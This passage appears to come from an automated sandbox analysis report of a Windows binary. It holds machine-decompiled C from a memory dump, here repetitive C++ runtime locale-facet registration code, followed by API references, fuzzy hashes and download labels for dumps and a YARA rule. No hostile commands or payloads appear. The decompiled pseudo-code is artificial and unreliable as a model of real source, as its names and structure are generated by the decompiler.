				_t266 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t265);
				_t758 = _t266;
				if(_t266 != 0) {
					L5:
					E6DDD66BA(_t814 - 0x14);
					return E6DDF0075(_t758);
				} else {
					if(_t777 == 0) {
						_push( *((intOrPtr*)(_t814 + 8)));
						_push(_t814 - 0x10);
						__eflags = E6DDE0EB7(__ebx, _t578, __edx, _t758, _t777) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t814 - 0x20);
							E6DDF3D74(_t814 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t758, _t777, 0x14);
							E6DDD6653(_t814 - 0x14, 0);
							_t778 =  *0x6de96db8; // 0x0
							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
							 *(_t814 - 0x10) = _t778;
							_t278 = E6DDB161C(0x6de96d6c);
							_t585 =  *((intOrPtr*)(_t814 + 8));
							_t759 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t278);
							__eflags = _t759;
							if(_t759 != 0) {
								L12:
								E6DDD66BA(_t814 - 0x14);
								return E6DDF0075(_t759);
							} else {
								__eflags = _t778;
								if(_t778 == 0) {
									_push( *((intOrPtr*)(_t814 + 8)));
									_push(_t814 - 0x10);
									__eflags = E6DDE0F1F(_t575, _t585, __edx, _t759, _t778) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t814 - 0x20);
										E6DDF3D74(_t814 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t575, _t759, _t778, 0x14);
										E6DDD6653(_t814 - 0x14, 0);
										_t779 =  *0x6de96dec; // 0x0
										 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
										 *(_t814 - 0x10) = _t779;
										_t291 = E6DDB161C(0x6de96d98);
										_t592 =  *((intOrPtr*)(_t814 + 8));
										_t760 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t291);
										__eflags = _t760;
										if(_t760 != 0) {
											L19:
											E6DDD66BA(_t814 - 0x14);
											return E6DDF0075(_t760);
										} else {
											__eflags = _t779;
											if(_t779 == 0) {
												_push( *((intOrPtr*)(_t814 + 8)));
												_push(_t814 - 0x10);
												__eflags = E6DDE0F87(_t575, _t592, __edx, _t760, _t779) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t814 - 0x20);
													E6DDF3D74(_t814 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t575, _t760, _t779, 0x14);
													E6DDD6653(_t814 - 0x14, 0);
													_t780 =  *0x6de96dbc; // 0x0
													 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
													 *(_t814 - 0x10) = _t780;
													_t304 = E6DDB161C(0x6de96d70);
													_t599 =  *((intOrPtr*)(_t814 + 8));
													_t761 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t304);
													__eflags = _t761;
													if(_t761 != 0) {
														L26:
														E6DDD66BA(_t814 - 0x14);
														return E6DDF0075(_t761);
													} else {
														__eflags = _t780;
														if(_t780 == 0) {
															_push( *((intOrPtr*)(_t814 + 8)));
															_push(_t814 - 0x10);
															__eflags = E6DDE0FEF(_t575, _t599, _t756, _t761, _t780) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t814 - 0x20);
																E6DDF3D74(_t814 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t575, _t761, _t780, 0x14);
																E6DDD6653(_t814 - 0x14, 0);
																_t781 =  *0x6de96df0; // 0x0
																 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																 *(_t814 - 0x10) = _t781;
																_t317 = E6DDB161C(0x6de96d9c);
																_t606 =  *((intOrPtr*)(_t814 + 8));
																_t762 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t317);
																__eflags = _t762;
																if(_t762 != 0) {
																	L33:
																	E6DDD66BA(_t814 - 0x14);
																	return E6DDF0075(_t762);
																} else {
																	__eflags = _t781;
																	if(_t781 == 0) {
																		_push( *((intOrPtr*)(_t814 + 8)));
																		_push(_t814 - 0x10);
																		__eflags = E6DDE1057(_t575, _t606, _t756, _t762, _t781) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t814 - 0x20);
																			E6DDF3D74(_t814 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t575, _t762, _t781, 0x14);
																			E6DDD6653(_t814 - 0x14, 0);
																			_t782 =  *0x6de96dc0; // 0x0
																			 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																			 *(_t814 - 0x10) = _t782;
																			_t330 = E6DDB161C(0x6de96d74);
																			_t613 =  *((intOrPtr*)(_t814 + 8));
																			_t763 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t330);
																			__eflags = _t763;
																			if(_t763 != 0) {
																				L40:
																				E6DDD66BA(_t814 - 0x14);
																				return E6DDF0075(_t763);
																			} else {
																				__eflags = _t782;
																				if(_t782 == 0) {
																					_push( *((intOrPtr*)(_t814 + 8)));
																					_push(_t814 - 0x10);
																					__eflags = E6DDE10BF(_t575, _t613, _t756, _t763, _t782) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t814 - 0x20);
																						E6DDF3D74(_t814 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t575, _t763, _t782, 0x14);
																						E6DDD6653(_t814 - 0x14, 0);
																						_t783 =  *0x6de96df8; // 0x0
																						 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																						 *(_t814 - 0x10) = _t783;
																						_t343 = E6DDB161C(0x6de96da4);
																						_t620 =  *((intOrPtr*)(_t814 + 8));
																						_t764 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t343);
																						__eflags = _t764;
																						if(_t764 != 0) {
																							L47:
																							E6DDD66BA(_t814 - 0x14);
																							return E6DDF0075(_t764);
																						} else {
																							__eflags = _t783;
																							if(_t783 == 0) {
																								_push( *((intOrPtr*)(_t814 + 8)));
																								_push(_t814 - 0x10);
																								__eflags = E6DDE1127(_t575, _t620, _t756, _t764, _t783) - 0xffffffff;
																								if(__eflags == 0) {
																									E6DDB1438(_t814 - 0x20);
																									E6DDF3D74(_t814 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de383cf, _t575, _t764, _t783, 0x14);
																									E6DDD6653(_t814 - 0x14, 0);
																									_t784 =  *0x6de96df4; // 0x0
																									 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																									 *(_t814 - 0x10) = _t784;
																									_t356 = E6DDB161C(0x6de96da0);
																									_t627 =  *((intOrPtr*)(_t814 + 8));
																									_t765 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t356);
																									__eflags = _t765;
																									if(_t765 != 0) {
																										L54:
																										E6DDD66BA(_t814 - 0x14);
																										return E6DDF0075(_t765);
																									} else {
																										__eflags = _t784;
																										if(_t784 == 0) {
																											_push( *((intOrPtr*)(_t814 + 8)));
																											_push(_t814 - 0x10);
																											__eflags = E6DDE11AB(_t575, _t627, _t756, _t765, _t784) - 0xffffffff;
																											if(__eflags == 0) {
																												E6DDB1438(_t814 - 0x20);
																												E6DDF3D74(_t814 - 0x20, 0x6de93504);
																												asm("int3");
																												E6DDF00AC(0x6de383cf, _t575, _t765, _t784, 0x14);
																												E6DDD6653(_t814 - 0x14, 0);
																												_t785 =  *0x6de96dc8; // 0x0
																												 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																												 *(_t814 - 0x10) = _t785;
																												_t369 = E6DDB161C(0x6de96d7c);
																												_t634 =  *((intOrPtr*)(_t814 + 8));
																												_t766 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t369);
																												__eflags = _t766;
																												if(_t766 != 0) {
																													L61:
																													E6DDD66BA(_t814 - 0x14);
																													return E6DDF0075(_t766);
																												} else {
																													__eflags = _t785;
																													if(_t785 == 0) {
																														_push( *((intOrPtr*)(_t814 + 8)));
																														_push(_t814 - 0x10);
																														__eflags = E6DDE1230(_t575, _t634, _t756, _t766, _t785) - 0xffffffff;
																														if(__eflags == 0) {
																															E6DDB1438(_t814 - 0x20);
																															E6DDF3D74(_t814 - 0x20, 0x6de93504);
																															asm("int3");
																															E6DDF00AC(0x6de383cf, _t575, _t766, _t785, 0x14);
																															E6DDD6653(_t814 - 0x14, 0);
																															_t786 =  *0x6de96dc4; // 0x0
																															 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																															 *(_t814 - 0x10) = _t786;
																															_t382 = E6DDB161C(0x6de96d78);
																															_t641 =  *((intOrPtr*)(_t814 + 8));
																															_t767 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t382);
																															__eflags = _t767;
																															if(_t767 != 0) {
																																L68:
																																E6DDD66BA(_t814 - 0x14);
																																return E6DDF0075(_t767);
																															} else {
																																__eflags = _t786;
																																if(_t786 == 0) {
																																	_push( *((intOrPtr*)(_t814 + 8)));
																																	_push(_t814 - 0x10);
																																	__eflags = E6DDE12B4(_t575, _t641, _t756, _t767, _t786) - 0xffffffff;
																																	if(__eflags == 0) {
																																		E6DDB1438(_t814 - 0x20);
																																		E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																		asm("int3");
																																		E6DDF00AC(0x6de383cf, _t575, _t767, _t786, 0x14);
																																		E6DDD6653(_t814 - 0x14, 0);
																																		_t787 =  *0x6de96dd8; // 0x0
																																		 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																		 *(_t814 - 0x10) = _t787;
																																		_t395 = E6DDB161C(0x6de96d84);
																																		_t648 =  *((intOrPtr*)(_t814 + 8));
																																		_t768 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t395);
																																		__eflags = _t768;
																																		if(_t768 != 0) {
																																			L75:
																																			E6DDD66BA(_t814 - 0x14);
																																			return E6DDF0075(_t768);
																																		} else {
																																			__eflags = _t787;
																																			if(_t787 == 0) {
																																				_push( *((intOrPtr*)(_t814 + 8)));
																																				_push(_t814 - 0x10);
																																				__eflags = E6DDE1339(_t575, _t648, _t756, _t768, _t787) - 0xffffffff;
																																				if(__eflags == 0) {
																																					E6DDB1438(_t814 - 0x20);
																																					E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																					asm("int3");
																																					E6DDF00AC(0x6de383cf, _t575, _t768, _t787, 0x14);
																																					E6DDD6653(_t814 - 0x14, 0);
																																					_t788 =  *0x6de96db0; // 0x0
																																					 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																					 *(_t814 - 0x10) = _t788;
																																					_t408 = E6DDB161C(0x6de96d64);
																																					_t655 =  *((intOrPtr*)(_t814 + 8));
																																					_t769 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t408);
																																					__eflags = _t769;
																																					if(_t769 != 0) {
																																						L82:
																																						E6DDD66BA(_t814 - 0x14);
																																						return E6DDF0075(_t769);
																																					} else {
																																						__eflags = _t788;
																																						if(_t788 == 0) {
																																							_push( *((intOrPtr*)(_t814 + 8)));
																																							_push(_t814 - 0x10);
																																							__eflags = E6DDE13A1(_t575, _t655, _t756, _t769, _t788) - 0xffffffff;
																																							if(__eflags == 0) {
																																								E6DDB1438(_t814 - 0x20);
																																								E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																								asm("int3");
																																								E6DDF00AC(0x6de383cf, _t575, _t769, _t788, 0x14);
																																								E6DDD6653(_t814 - 0x14, 0);
																																								_t789 =  *0x6de96ddc; // 0x0
																																								 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																								 *(_t814 - 0x10) = _t789;
																																								_t421 = E6DDB161C(0x6de96d88);
																																								_t662 =  *((intOrPtr*)(_t814 + 8));
																																								_t770 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t421);
																																								__eflags = _t770;
																																								if(_t770 != 0) {
																																									L89:
																																									E6DDD66BA(_t814 - 0x14);
																																									return E6DDF0075(_t770);
																																								} else {
																																									__eflags = _t789;
																																									if(_t789 == 0) {
																																										_push( *((intOrPtr*)(_t814 + 8)));
																																										_push(_t814 - 0x10);
																																										__eflags = E6DDE1409(_t575, _t662, _t756, _t770, _t789) - 0xffffffff;
																																										if(__eflags == 0) {
																																											E6DDB1438(_t814 - 0x20);
																																											E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																											asm("int3");
																																											E6DDF00AC(0x6de383cf, _t575, _t770, _t789, 0x14);
																																											E6DDD6653(_t814 - 0x14, 0);
																																											_t790 =  *0x6de96de0; // 0x0
																																											 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																											 *(_t814 - 0x10) = _t790;
																																											_t434 = E6DDB161C(0x6de96d8c);
																																											_t669 =  *((intOrPtr*)(_t814 + 8));
																																											_t771 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t434);
																																											__eflags = _t771;
																																											if(_t771 != 0) {
																																												L96:
																																												E6DDD66BA(_t814 - 0x14);
																																												return E6DDF0075(_t771);
																																											} else {
																																												__eflags = _t790;
																																												if(_t790 == 0) {
																																													_push( *((intOrPtr*)(_t814 + 8)));
																																													_push(_t814 - 0x10);
																																													__eflags = E6DDE1471(_t575, _t669, _t756, _t771, _t790) - 0xffffffff;
																																													if(__eflags == 0) {
																																														E6DDB1438(_t814 - 0x20);
																																														E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																														asm("int3");
																																														E6DDF00AC(0x6de383cf, _t575, _t771, _t790, 0x14);
																																														E6DDD6653(_t814 - 0x14, 0);
																																														_t791 =  *0x6de96dfc; // 0x0
																																														 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																														 *(_t814 - 0x10) = _t791;
																																														_t447 = E6DDB161C(0x6de96da8);
																																														_t676 =  *((intOrPtr*)(_t814 + 8));
																																														_t772 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t447);
																																														__eflags = _t772;
																																														if(_t772 != 0) {
																																															L103:
																																															E6DDD66BA(_t814 - 0x14);
																																															return E6DDF0075(_t772);
																																														} else {
																																															__eflags = _t791;
																																															if(_t791 == 0) {
																																																_push( *((intOrPtr*)(_t814 + 8)));
																																																_push(_t814 - 0x10);
																																																__eflags = E6DDE14EC(_t575, _t676, _t756, _t772, _t791) - 0xffffffff;
																																																if(__eflags == 0) {
																																																	E6DDB1438(_t814 - 0x20);
																																																	E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																	asm("int3");
																																																	E6DDF00AC(0x6de383cf, _t575, _t772, _t791, 0x14);
																																																	E6DDD6653(_t814 - 0x14, 0);
																																																	_t792 =  *0x6de96dcc; // 0x0
																																																	 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																	 *(_t814 - 0x10) = _t792;
																																																	_t460 = E6DDB161C(0x6de96d80);
																																																	_t683 =  *((intOrPtr*)(_t814 + 8));
																																																	_t773 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t460);
																																																	__eflags = _t773;
																																																	if(_t773 != 0) {
																																																		L110:
																																																		E6DDD66BA(_t814 - 0x14);
																																																		return E6DDF0075(_t773);
																																																	} else {
																																																		__eflags = _t792;
																																																		if(_t792 == 0) {
																																																			_push( *((intOrPtr*)(_t814 + 8)));
																																																			_push(_t814 - 0x10);
																																																			__eflags = E6DDE1558(_t575, _t683, _t756, _t773, _t792) - 0xffffffff;
																																																			if(__eflags == 0) {
																																																				E6DDB1438(_t814 - 0x20);
																																																				E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																				asm("int3");
																																																				E6DDF00AC(0x6de383cf, _t575, _t773, _t792, 0x14);
																																																				E6DDD6653(_t814 - 0x14, 0);
																																																				_t793 =  *0x6de96e00; // 0x0
																																																				 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																				 *(_t814 - 0x10) = _t793;
																																																				_t473 = E6DDB161C(0x6de96dac);
																																																				_t690 =  *((intOrPtr*)(_t814 + 8));
																																																				_t774 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t473);
																																																				__eflags = _t774;
																																																				if(_t774 != 0) {
																																																					L117:
																																																					E6DDD66BA(_t814 - 0x14);
																																																					return E6DDF0075(_t774);
																																																				} else {
																																																					__eflags = _t793;
																																																					if(_t793 == 0) {
																																																						_push( *((intOrPtr*)(_t814 + 8)));
																																																						_push(_t814 - 0x10);
																																																						__eflags = E6DDE15C4(_t575, _t690, _t756, _t774, _t793) - 0xffffffff;
																																																						if(__eflags == 0) {
																																																							E6DDB1438(_t814 - 0x20);
																																																							E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																							asm("int3");
																																																							E6DDF00AC(0x6de383cf, _t575, _t774, _t793, 0x14);
																																																							E6DDD6653(_t814 - 0x14, 0);
																																																							_t794 =  *0x6de96dd0; // 0x0
																																																							 *(_t814 - 4) =  *(_t814 - 4) & 0x00000000;
																																																							 *(_t814 - 0x10) = _t794;
																																																							_t486 = E6DDB161C(0x6de96d60);
																																																							_t697 =  *((intOrPtr*)(_t814 + 8));
																																																							_t775 = E6DDB171B( *((intOrPtr*)(_t814 + 8)), _t486);
																																																							__eflags = _t775;
																																																							if(_t775 != 0) {
																																																								L124:
																																																								E6DDD66BA(_t814 - 0x14);
																																																								return E6DDF0075(_t775);
																																																							} else {
																																																								__eflags = _t794;
																																																								if(_t794 == 0) {
																																																									_push( *((intOrPtr*)(_t814 + 8)));
																																																									_push(_t814 - 0x10);
																																																									__eflags = E6DDE162A(_t575, _t697, _t756, _t775, _t794) - 0xffffffff;
																																																									if(__eflags == 0) {
																																																										_t701 = _t814 - 0x20;
																																																										E6DDB1438(_t701);
																																																										E6DDF3D74(_t814 - 0x20, 0x6de93504);
																																																										asm("int3");
																																																										E6DDF00AC(0x6de3851f, _t575, _t775, _t794, 4);
																																																										_t795 = _t701;
																																																										 *(_t814 - 0x10) = _t795;
																																																										 *((intOrPtr*)(_t795 + 4)) =  *((intOrPtr*)(_t814 + 0xc));
																																																										_push( *((intOrPtr*)(_t814 + 0x14)));
																																																										_t259 = _t814 - 4;
																																																										 *_t259 =  *(_t814 - 4) & 0x00000000;
																																																										__eflags =  *_t259;
																																																										 *_t795 = 0x6de3c0c4;
																																																										 *((char*)(_t795 + 0x28)) =  *((intOrPtr*)(_t814 + 0x10));
																																																										E6DDE542F(_t575, _t701, _t756, _t775, _t795,  *_t259);
																																																										return E6DDF0075(_t795,  *((intOrPtr*)(_t814 + 8)));
																																																									} else {
																																																										_t775 =  *(_t814 - 0x10);
																																																										 *(_t814 - 0x10) = _t775;
																																																										 *(_t814 - 4) = 1;
																																																										E6DDD6FD3(__eflags, _t775);
																																																										 *0x6de3a26c();
																																																										 *((intOrPtr*)( *((intOrPtr*)( *_t775 + 4))))();
																																																										 *0x6de96dd0 = _t775;
																																																										goto L124;
																																																									}
																																																								} else {
																																																									_t775 = _t794;
																																																									goto L124;
																																																								}
																																																							}
																																																						} else {
																																																							_t774 =  *(_t814 - 0x10);
																																																							 *(_t814 - 0x10) = _t774;
																																																							 *(_t814 - 4) = 1;
																																																							E6DDD6FD3(__eflags, _t774);
																																																							 *0x6de3a26c();
																																																							 *((intOrPtr*)( *((intOrPtr*)( *_t774 + 4))))();
																																																							 *0x6de96e00 = _t774;
																																																							goto L117;
																																																						}
																																																					} else {
																																																						_t774 = _t793;
																																																						goto L117;
																																																					}
																																																				}
																																																			} else {
																																																				_t773 =  *(_t814 - 0x10);
																																																				 *(_t814 - 0x10) = _t773;
																																																				 *(_t814 - 4) = 1;
																																																				E6DDD6FD3(__eflags, _t773);
																																																				 *0x6de3a26c();
																																																				 *((intOrPtr*)( *((intOrPtr*)( *_t773 + 4))))();
																																																				 *0x6de96dcc = _t773;
																																																				goto L110;
																																																			}
																																																		} else {
																																																			_t773 = _t792;
																																																			goto L110;
																																																		}
																																																	}
																																																} else {
																																																	_t772 =  *(_t814 - 0x10);
																																																	 *(_t814 - 0x10) = _t772;
																																																	 *(_t814 - 4) = 1;
																																																	E6DDD6FD3(__eflags, _t772);
																																																	 *0x6de3a26c();
																																																	 *((intOrPtr*)( *((intOrPtr*)( *_t772 + 4))))();
																																																	 *0x6de96dfc = _t772;
																																																	goto L103;
																																																}
																																															} else {
																																																_t772 = _t791;
																																																goto L103;
																																															}
																																														}
																																													} else {
																																														_t771 =  *(_t814 - 0x10);
																																														 *(_t814 - 0x10) = _t771;
																																														 *(_t814 - 4) = 1;
																																														E6DDD6FD3(__eflags, _t771);
																																														 *0x6de3a26c();
																																														 *((intOrPtr*)( *((intOrPtr*)( *_t771 + 4))))();
																																														 *0x6de96de0 = _t771;
																																														goto L96;
																																													}
																																												} else {
																																													_t771 = _t790;
																																													goto L96;
																																												}
																																											}
																																										} else {
																																											_t770 =  *(_t814 - 0x10);
																																											 *(_t814 - 0x10) = _t770;
																																											 *(_t814 - 4) = 1;
																																											E6DDD6FD3(__eflags, _t770);
																																											 *0x6de3a26c();
																																											 *((intOrPtr*)( *((intOrPtr*)( *_t770 + 4))))();
																																											 *0x6de96ddc = _t770;
																																											goto L89;
																																										}
																																									} else {
																																										_t770 = _t789;
																																										goto L89;
																																									}
																																								}
																																							} else {
																																								_t769 =  *(_t814 - 0x10);
																																								 *(_t814 - 0x10) = _t769;
																																								 *(_t814 - 4) = 1;
																																								E6DDD6FD3(__eflags, _t769);
																																								 *0x6de3a26c();
																																								 *((intOrPtr*)( *((intOrPtr*)( *_t769 + 4))))();
																																								 *0x6de96db0 = _t769;
																																								goto L82;
																																							}
																																						} else {
																																							_t769 = _t788;
																																							goto L82;
																																						}
																																					}
																																				} else {
																																					_t768 =  *(_t814 - 0x10);
																																					 *(_t814 - 0x10) = _t768;
																																					 *(_t814 - 4) = 1;
																																					E6DDD6FD3(__eflags, _t768);
																																					 *0x6de3a26c();
																																					 *((intOrPtr*)( *((intOrPtr*)( *_t768 + 4))))();
																																					 *0x6de96dd8 = _t768;
																																					goto L75;
																																				}
																																			} else {
																																				_t768 = _t787;
																																				goto L75;
																																			}
																																		}
																																	} else {
																																		_t767 =  *(_t814 - 0x10);
																																		 *(_t814 - 0x10) = _t767;
																																		 *(_t814 - 4) = 1;
																																		E6DDD6FD3(__eflags, _t767);
																																		 *0x6de3a26c();
																																		 *((intOrPtr*)( *((intOrPtr*)( *_t767 + 4))))();
																																		 *0x6de96dc4 = _t767;
																																		goto L68;
																																	}
																																} else {
																																	_t767 = _t786;
																																	goto L68;
																																}
																															}
																														} else {
																															_t766 =  *(_t814 - 0x10);
																															 *(_t814 - 0x10) = _t766;
																															 *(_t814 - 4) = 1;
																															E6DDD6FD3(__eflags, _t766);
																															 *0x6de3a26c();
																															 *((intOrPtr*)( *((intOrPtr*)( *_t766 + 4))))();
																															 *0x6de96dc8 = _t766;
																															goto L61;
																														}
																													} else {
																														_t766 = _t785;
																														goto L61;
																													}
																												}
																											} else {
																												_t765 =  *(_t814 - 0x10);
																												 *(_t814 - 0x10) = _t765;
																												 *(_t814 - 4) = 1;
																												E6DDD6FD3(__eflags, _t765);
																												 *0x6de3a26c();
																												 *((intOrPtr*)( *((intOrPtr*)( *_t765 + 4))))();
																												 *0x6de96df4 = _t765;
																												goto L54;
																											}
																										} else {
																											_t765 = _t784;
																											goto L54;
																										}
																									}
																								} else {
																									_t764 =  *(_t814 - 0x10);
																									 *(_t814 - 0x10) = _t764;
																									 *(_t814 - 4) = 1;
																									E6DDD6FD3(__eflags, _t764);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t764 + 4))))();
																									 *0x6de96df8 = _t764;
																									goto L47;
																								}
																							} else {
																								_t764 = _t783;
																								goto L47;
																							}
																						}
																					} else {
																						_t763 =  *(_t814 - 0x10);
																						 *(_t814 - 0x10) = _t763;
																						 *(_t814 - 4) = 1;
																						E6DDD6FD3(__eflags, _t763);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t763 + 4))))();
																						 *0x6de96dc0 = _t763;
																						goto L40;
																					}
																				} else {
																					_t763 = _t782;
																					goto L40;
																				}
																			}
																		} else {
																			_t762 =  *(_t814 - 0x10);
																			 *(_t814 - 0x10) = _t762;
																			 *(_t814 - 4) = 1;
																			E6DDD6FD3(__eflags, _t762);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t762 + 4))))();
																			 *0x6de96df0 = _t762;
																			goto L33;
																		}
																	} else {
																		_t762 = _t781;
																		goto L33;
																	}
																}
															} else {
																_t761 =  *(_t814 - 0x10);
																 *(_t814 - 0x10) = _t761;
																 *(_t814 - 4) = 1;
																E6DDD6FD3(__eflags, _t761);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t761 + 4))))();
																 *0x6de96dbc = _t761;
																goto L26;
															}
														} else {
															_t761 = _t780;
															goto L26;
														}
													}
												} else {
													_t760 =  *(_t814 - 0x10);
													 *(_t814 - 0x10) = _t760;
													 *(_t814 - 4) = 1;
													E6DDD6FD3(__eflags, _t760);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t760 + 4))))();
													 *0x6de96dec = _t760;
													goto L19;
												}
											} else {
												_t760 = _t779;
												goto L19;
											}
										}
									} else {
										_t759 =  *(_t814 - 0x10);
										 *(_t814 - 0x10) = _t759;
										 *(_t814 - 4) = 1;
										E6DDD6FD3(__eflags, _t759);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t759 + 4))))();
										 *0x6de96db8 = _t759;
										goto L12;
									}
								} else {
									_t759 = _t778;
									goto L12;
								}
							}
						} else {
							_t758 =  *(_t814 - 0x10);
							 *(_t814 - 0x10) = _t758;
							 *(_t814 - 4) = 1;
							E6DDD6FD3(__eflags, _t758);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t758 + 4))))();
							 *0x6de96de8 = _t758;
							goto L5;
						}
					} else {
						_t758 = _t777;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF18A
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF194
int.LIBCPMT ref: 6DDDF1AB

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

messages.LIBCPMT ref: 6DDDF1CE
std::_Facet_Register.LIBCPMT ref: 6DDDF1E5
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF205
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF223

Memory Dump Source

Source File: 0000000F.00000002.526779862.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 0000000F.00000002.525210035.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.561475064.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.580235339.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.582478013.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.583528665.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmessages
String ID:
API String ID: 438560357-0
Opcode ID: 03910cc5c898f47b0e47ee505217858be00cbde8d9fb26c40d3fc11dbdf8d8ee
Instruction ID: ed7608197176dff12b9ddfeccd9af5085c96ace93621fcba128217e95e180beb
Opcode Fuzzy Hash: 03910cc5c898f47b0e47ee505217858be00cbde8d9fb26c40d3fc11dbdf8d8ee
Instruction Fuzzy Hash: 3411A076848119DBCF05FBA4D840EFDB775AF84718F26040AFA21AB294DF749A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDA059, Relevance: 10.6, APIs: 7, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E6DDDA059(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a8) {
				signed int _v4;
				intOrPtr _v12;
				void* _v16;
				char _v20;
				intOrPtr* _v28;
				char _v32;
				void* _t77;
				intOrPtr* _t78;
				void* _t90;
				void* _t103;
				void* _t116;
				void* _t129;
				intOrPtr* _t196;
				intOrPtr* _t215;
				intOrPtr* _t216;
				intOrPtr* _t217;
				intOrPtr* _t218;
				void* _t220;
				intOrPtr* _t221;
				intOrPtr* _t222;
				intOrPtr* _t223;
				void* _t224;

				_t212 = __edx;
				_t161 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653( &_v20, 0);
				_t220 =  *0x6de96cd8; // 0x0
				_v4 = _v4 & 0x00000000;
				_v16 = _t220;
				_t77 = E6DDB161C(0x6de96cc4);
				_t164 = _a8;
				_t78 = E6DDB171B(_a8, _t77);
				_t214 = _t78;
				if(_t78 != 0) {
					L5:
					E6DDD66BA( &_v20);
					return E6DDF0075(_t214);
				} else {
					if(_t220 == 0) {
						_push(_a8);
						_push( &_v16);
						__eflags = E6DDDA96A(__ebx, _t164, __edx, _t214, _t220) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438( &_v32);
							E6DDF3D74( &_v32, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t214, _t220, 0x14);
							E6DDD6653( &_v20, 0);
							_t221 =  *0x6de96cc8; // 0x0
							_v4 = _v4 & 0x00000000;
							_v16 = _t221;
							_t90 = E6DDB161C(0x6de96b38);
							_t171 = _a8;
							_t215 = E6DDB171B(_a8, _t90);
							__eflags = _t215;
							if(_t215 != 0) {
								L12:
								E6DDD66BA( &_v20);
								return E6DDF0075(_t215);
							} else {
								__eflags = _t221;
								if(_t221 == 0) {
									_push(_a8);
									_push( &_v16);
